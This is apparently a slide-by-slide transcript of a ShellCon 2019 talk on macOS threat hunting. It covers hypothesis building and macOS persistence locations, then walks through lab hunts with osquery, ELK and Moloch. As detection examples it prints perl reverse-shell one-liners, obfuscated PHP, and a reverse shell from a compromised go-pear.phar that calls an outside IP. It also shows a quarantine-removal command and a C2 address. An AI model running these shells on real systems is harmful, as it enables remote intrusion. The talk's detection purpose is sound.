MacOS Threat Hunting - ShellCon 2019

Transcript

1. macOS Threat Hunting ShellCon 2019

2. 2 About us

3. 3 osquery> select * from logged_in_users ; osquery> select *

   from logged_in_users ; +------+---------+----------+--------+-------------+-------+ | type | user | tty | Role | Passtime | pid | +------+---------+----------+--------+-------------+-------+ | user | Art | console| DFIR | <secret> | 88 | | user | Plug | ttys01 | DFIR | Synths | 133 | +------+---------+----------+--------+-------------+-------+ osquery>

4. 4 Paranoids

5. 5 Agenda: • Background for the talk • From observation

   to hypothesis • Laying the foundation: Things to Hunt in macOS • Putting into action: Let’s go Hunt • Final Notes • Questions

6. Most common questions: • • • What should I hunt?

   • How do I get started? • 6

7. What is Hunting... • • It is "the process of

   proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions." -Wikipedia 7

8. What is Hunting... • • “Simply put, hunting is the

   act of finding ways for evil to do evil things” -Danny Akacki 8

9. Hunt Use Cases [What should I hunt] • Previous Incident

   • Threat Intel Data • Adversary Emulation • Research • Red Team • Crown Jewels • Defense Posture Assumptions 9

10. A note about data... • • Data and it’s quality,

    is key. • 10

11. Data... • For your review • 11 https://github.com/hunters-forge/ThreatHunter-Playbook/tree/ master/pre-hunt •

    Roberto Rodriguez @Cyb3rWard0g • Jose Luis Rodriguez @Cyb3rPandaH

12. Threat Hunting is not difficult • • The hunt process

    is simple. • 12

13. 13 The Hypothesis

14. 14 WHY 05 • PURPOSE • REASON BEHIND THE HUNT

    WHEN 04 • DATE • TIME • DURATION WHERE 03 • THE LOCATION OF ARTIFACTS WE WANT TO HUNT IN THE DATA WHAT 02 • THE ITEM WE WANT TO HUNT WHO 01 • USERNAME/ACCOUNT • HOSTNAME • IP/PORT The Hypothesis

15. 15 HOW 06 • THE WAY WE ARE GOING TO

    CONDUCT THE HUNT The Hypothesis

16. 16 The Hypothesis Creating a hypothesis

17. 17 The Hypothesis

18. 18 The Hypothesis

19. 19 The Hypothesis

20. Hunting Templates • • ThreatHuntingProject • ThreatHunting Template 20 https://github.com/ThreatHuntingProject/ThreatHunting/blob/master/TECH

    NIQUE%20TEMPLATE.md

21. Hunting Templates • • ThreatHunter-Playbook • Hunting Template 21 https://github.com/hunters-forge/ThreatHunter-Playbook

22. 22 Creating Test Cases Do I have the data to

    test the hypothesis? • Who • What • When • Where • Why • How Yes No Idea No Create one!

23. 23 Creating Test Cases Do I know what to look

    for? • Launch Daemons/Agents • Kernel extensions • Cron Jobs • Gatekeeper and XProtect Bypasses • Abnormal Shell Activity • Browser extensions Yes No Idea No Research!

24. 24 Creating Test Cases Do I need a test case?

    // Example gscript template // Title: Launch Agent Persistence // Author: ahhh // Purpose: Drop a sample binary and a launch agent plist and persist it using Launch Agent // Gscript version: 1.0.0 // ATT&CK: https://attack.mitre.org/wiki/Technique/T1159 Yes No Idea No Go Hunt ! Create one!

25. 25 Hunt Process Flow

26. Hunt Process Flow 26 Do you have a Hypothesis? Start

27. Hunt Process Flow 27 Do you have data?

28. Hunt Process Flow 28 Do you need a test case

    or emulation?

29. Hunt Process Flow 29 Ready for the Hunt!

30. Hunt Process Flow 30 Any issues found?

31. Hunt Process Flow 31 Any issues found?

32. Hunt Process Flow 32 Any issues found?

33. Hunt Process Flow 33 Any issues found?

34. Hunt Process Flow 34 Any issues found?

35. Hunt Process Flow 35 Any issues found?

36. Hunt Process Flow 36 Improve your Defenses Wins: • Less

    Visibility Gaps • Better Data • Better Detections • Metrics that quantify why the hunt program is valuable!

37. Hunt Process Flow 37 But, how about anomalies?

38. Hunt Process Flow 38 Any issues found?

39. Hunt Process Flow 39 VS Start Start

40. Hunt Process Flow 40 VS Start Start

41. Hunt Process Flow 41 Start

42. Hunt Process Recap 42 • Data • Hypothesis • Test

    Case • Hunt • Review Findings • Document Findings • Remediate Gaps • Improved Detections • Escalate [If needed] • Repeat

43. In short 43 • How do I get started? Create

    a Hypothesis and follow a process What should I hunt? Totally up-to you, use hunt cases as basis

44. 44 Laying the foundation: Step1 Step 2 Step 3 Step

    4 Step 5 Things to Hunt: macOS

45. macOS Malware • Mami • CrossRAT • CreativeUpdate • Shlayer

    • Dummy • Calisto • AppleJeus • WindTail • ETC….. 45 https://objective-see.com/blog/blog _0x3C.html

46. Places with great indicators • Launch Daemons • Launch Agents

    • Kernel extensions • Cron Jobs • Browser extensions • Abnormal Shell Activity • Gatekeeper and XProtect Bypasses • Exfiltration 46

47. Launch (Daemon|Agent)s • .plist (configuration) files ◦ Start, Stop and

    Manage scripts and processes • Launch Daemons ◦ Run without a logged in user. ◦ No GUI interaction. ◦ stored: /System/Library/LaunchDaemons/ & /Library/LaunchDaemons/ 47 Hypothesis: Do we have any outlier Launch (Daemon|Agent)s running in our environment? If yes, what are they and are they needed?

48. Launch (Daemon|Agent)s • Launch Agents ◦ Associated user must be

    logged in. ◦ GUI interaction. ◦ stored: /System/Library/LaunchAgents : /Library/LaunchAgents. : ~/Library/LaunchAgents folder. • Equivalent to runkeys and services on Windows 48

49. Kernel extensions 49 • OS X provides a kernel extension

    mechanism as a means of allowing dynamic loading of code into the kernel, without the need to recompile or relink. Because KEXTs provide both modularity and dynamic loadability, they are a natural choice for any relatively self-contained service that requires access to internal kernel interfaces -- [BADNESS!] -- https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/KernelProgramming/Extend/Extend.html • KMs are typically loaded into /lib/modules as extension .ko • Adversaries will check KMs before loading maliciousness to ensure compilation • Monitor for execution of kextload commands ◦ Correlate with known goods. https://attack.mitre.org/techniques/T1215/ Hypothesis: Do we have non standard kext loads in our environment? Are security tools being kext unloaded?

50. Cron Jobs • /etc/crontab file, /etc/cron.d/ • at • launchd

    ◦ Each launchd job is described by a different (plist) file ◦ Additional Key called: StartCalendarInterval • What is normal in your environment? ◦ Rack and stack -- find the outliers! Hypothesis: What scheduled jobs are running? What is different across the endpoint corpus? 50

51. Browser extensions • Inventory and monitor browser extension installations that

    deviate from normal, expected, and benign extensions. ◦ Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates. • Monitor for any new items written to the Registry or PE files written to disk. ◦ May correlate with browser extension installation. 51 https://attack.mitre.org/techniques/T1176/ Hypothesis: Do we have malicious or unknown browser extensions running?

52. Abnormal Shell Activity • Odd SSH Commands (ssh -R with

    follow-on external connect?) • Local port forwards • Why are you touching /etc/pam.d/sudo? ◦ SPOILER: TOUCH TO SUDO! (or badness) • Stomping history files • What is that running from /tmp/? • etc 52

53. Gatekeeper and XProtect Bypasses 53 • When files are downloaded

    from the internet the com.apple.quarantine attribute flag is set. ◦ At program execution this flag will prompt the user to allow or deny execution as the system acknowledges that the file was downloaded from the internet. • Files from external media or network shares do not set this flag! ◦ The Gatekeeper check is now bypassed ◦ hunt for this attribute being removed with ▪ xattr -r -d com.apple.quarantine /path/to/MyApp.app https://attack.mitre.org/techniques/T1144/ Hypothesis: Are Q flags being removed? Is yes, why? courtesy of osxdaily.com

54. Exfiltration • Mass Directory Compression • Keyword Searching ◦ Pass,pw,password,key,token

    ◦ $mySuperSecretSpecialSauce • Cloud Storage Solutions ◦ Does your AUP allow: ▪ DropBox ▪ iCloud ▪ etc. • Pastebin (etc etc etc) ◦ Monitor uploads • Corporate Mobile Use ◦ Blind (etc etc etc) 54

55. 55 Putting into action: Step1 Step 2 Step 3 Step

    4 Step 5 Let’s go Hunt

56. Huntlab Osquery 56 Kolide Fleet Fortinet FortiAppMonitor FireEye Monitor.App ELK

    Stack Moloch

57. Huntlab - Host and Network Visibility 57 + = Host

    Level Network Level Hunters Dream!

58. Huntlab Gscript -@alexlevinson and CCDCRedTeam 58 EvilOsx -Marten4n6 Some malware

    :) Old Fashion Console Apfell - @its_a_feature_ Huge props and thanks to: @1njecti0n

59. Huntlab - Setup 59

60. Hypothesis 60

61. macOS Prompt for Password 61 Hypothesis: What OSAScripts do we

    have visibility into? Any outliers?

62. macOS Prompt for Password 62 Secrets Collected Hypothesis: What OSAScripts

    do we have visibility into? Any outliers?

63. macOS Prompt for Password 63 Event Activity Secrets Collected Hypothesis:

    What OSAScripts do we have visibility into? Any outliers?

64. macOS Prompt for Password Kibana example of the gs script

    being created and executed! 64

65. macOS Prompt for Password Kibana example of the gs script

    being created and executed! 65 Beware of Legit App Activity

66. macOS Prompt for Password Kibana example of the gs script

    being created and executed! 66 Beware of Legit App Activity

67. macOS Prompt for Password Kibana example of the gs script

    being created and executed! 67 Beware of Legit App Activity

68. Hypothesis 68

69. Odd shell activity - base64 blob 69 /bin/sh -c echo

    IyAtK10gY29kaW5nO…

70. Odd shell activity - base64 blob 70 Base64 decode

71. Odd shell activity - base64 blob 71 Base64 decode

72. Hypothesis 72

73. History Stomping! 73

74. History Stomping! 74

75. Hypothesis 75

76. OSX Dumy Callback attempts: 76

77. OSX Dumy Callback attempts: 77

78. OSX Dumy Callback attempts: 78

79. OSX Dumy Callback attempts: 79

80. OSX Dumy Callback attempts: 80

81. 81 Pause Recall this….

82. Huntlab - Host and Network Visibility 82 + = Host

    Level Network Level Hunters Dream!

83. Unleash the Owl! - https://molo.ch ~ https://github.com/aol/moloch Moloch is a

    Large scale, open source, indexed packet capture and search tool (FPC). 83 Shout-outs to: Andy Wick & Elyse Rinne & the entire moloch community! Thank you for your continuous contributions to Moloch!

84. OSX Dumy Callback attempts: 84 ip.dst == 185.243.115.230

85. OSX Dumy Callback attempts: 85

86. Go-Pear.phar 86 Rotten Pears

87. Hypothesis 87

88. Hunting perl tty/reverse shells 88 • perl -e 'use Socket;$i=""10.0.0.1"";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(""tcp""));if(c

    onnect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"">&S"");open(STDOUT,"">&S"");open(ST DERR,"">&S"");exec(""/bin/sh -i"");};' • perl -e 'exec "/bin/sh";' • perl: exec "/bin/sh"; • perl -MIO::Socket -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr => "x.x.x.x:xx");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''

89. Hunting perl reverse shells 89 • perl -e 'use Socket;$i=""10.0.0.1"";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(""tcp""));if(c

    onnect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"">&S"");open(STDOUT,"">&S"");open(ST DERR,"">&S"");exec(""/bin/sh -i"");};' • perl -e 'exec "/bin/sh";' • perl: exec "/bin/sh"; • perl -MIO::Socket -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr => "x.x.x.x:xx");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''

90. Hunting perl reverse shells 90 • perl -e 'use Socket;$i=""10.0.0.1"";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(""tcp""));if(

    connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"">&S"");open(STDOUT,"">&S"");open(ST DERR,"">&S"");exec(""/bin/sh -i"");};' • perl -e 'exec "/bin/sh";' • perl: exec "/bin/sh"; • perl -MIO::Socket -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr => "x.x.x.x:xx");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''

91. Go-Pear.phar aka Rotten Pears 91

92. Rotten Pears - Obfuscated Code 92 code snip: 1270:${"\x47\x4cO\x42\x41\x4cS"}["ki\x72\x69\ x68\x71\x68"]="st\x72";${${"GLOBA\x4c\x53"}..

    ."

93. Rotten Pears - Shell Code 93 {"GLOBALS"}["kirihqh"]="str";${${"GLOBALS"}["kir ihqh"]}="use Socket; print

    "started"; $host = "104.131.154.154"; $port = 443; $proto = getprotobyname("tcp") || socket(SERVER, PF_INET, SOCK_STREAM, $proto)

94. Rotten Pears - Reverse Shell 94 sh -c perl -e

    'use Socket; print "started"; $host = "104.131.154.154"; $port = 443; $proto = getprotobyname("tcp") || exit(); …...snip….print("exec"); exec {"/bin/sh"} "-bash" . "\0" x 4; print("exit"); exit(0); }' > /dev/null 2>/dev/null

95. Rotten Pears 95

96. Go-Pear.phar aka Rotten Pears 96

97. Go-Pear.phar aka Rotten Pears 97

98. Go-Pear.phar aka Rotten Pears 98

99. Rotten Pears 99

100. Recap 100 • How do I get started? Create a

     hypothesis and follow a process Step1 Step 2 Step 3 Step 4 Step 5

101. Recap 101 • What should I hunt? Totally up-to you,

     use hunt cases as basis

102. 102 Almost done When Hunting, review the findings

103. 103 Almost done Adjust and Improve Detections

104. Almost done 104 Experiment what works for your Org.

105. Almost done 105 Make your Hypothesis count, narrow the scope!

106. Almost done 106 Detailed Hypothesis = better Hunts

107. Host and Network Visibility 107 + = Host Level Network

     Level Hunters Dream!

108. 108 Almost done Step1 Step 2 Step 3 Step 4

     Step 5 Happy Hunting!

109. Props: 109 @1njecti0n - Awesome Red Teamer, checkout his blog:

     https://lockboxx.blogspot.com/ The folks and community behind Osquery and Fleet Andy Wick & Elyse Rinne & the entire moloch community! Thank you for your continuous contributions to Moloch! DC562, Reverse Shell Corp (RSC) & Shellcon Community The Awesome Paranoids Team You, thanks for watching! The Paranoids FIRE Team #IRLife

110. 110 End Step1 Step 2 Step 3 Step 4 Step

     5 Questions?